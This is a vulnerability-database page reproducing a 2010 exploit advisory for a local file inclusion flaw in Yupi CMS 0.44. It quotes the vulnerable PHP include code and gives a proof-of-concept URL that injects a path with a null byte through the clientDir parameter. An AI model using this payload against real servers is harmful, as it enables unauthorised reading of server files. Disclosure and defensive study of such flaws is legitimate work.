Lucene search
K

Yupi Cms 0.44 <= LOCAL File Inclusion Vulnerability

🗓️ 21 Mar 2010 00:00:00Reported by eidelweissType 
zdt
 zdt
🔗 0day.today👁 11 Views

Yupi Cms 0.44 Local File Inclusion Vulnerabilit

Code
===================================================
Yupi Cms 0.44 <= LOCAL File Inclusion Vulnerability
===================================================


Title: Yupi Cms 0.44 <= LOCAL File Inclusion Vulnerability
Version: 0.44
Link: http://yupi-cms.com/
License: http://www.opensource.org/licenses/afl-3.0.php
Author: eidelweiss
Contact: eidelweiss[at]cyberservices.com || [email protected]
Thanks: JosS (hack0wn) - r0073r & 0x1D (inj3ct0r) - LeQhi - aRiee - idiot_inside - kuris
 Old friend in MEDANHACKER (c02,blackbandit,t0rnado,LordIRC,doegoel,qwert)
Special Thank`s : AL-MARHUM - [D]eal [C]yber - syabilla_putri (miss u)

#################################################################################
History:

[+] 13 march 2010 : Vend0r (Author) contact
[-] No response
[*] 21 march 2010 (GMT+7): Bug Share to public

NB: This for educational purpose only , Author will not responsible for any damage

## REQUIRES ##


$thisDir = dirname(__FILE__);
$clientDir  = $thisDir;

require_once $clientDir."/config.php"; <-- w0w





define("SC_ROOT_PATH", php_file());

function php_file($filename=""){
   global $Confing;
   $fc = substr($filename,0,1);
   if ($fc=="\\" or $fc =="/"){
      $filename = substr($filename,1);
   }  
   
   $file = $Confing->PhpDir . $filename;
   return $file;

################################################################

P0C: ///filemanager/connectors/php/config.php?clientDir=[LFI]%00
 PATH/install/config.php?clientDir=[inj3ct0r] <- Not Sure LOL

################################################################
[ FIX ] Use Your Skill and Play Your Imagination
################################################################



#  0day.today [2018-04-14]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

21 Mar 2010 00:00Current
7.1High risk
Vulners AI Score7.1
11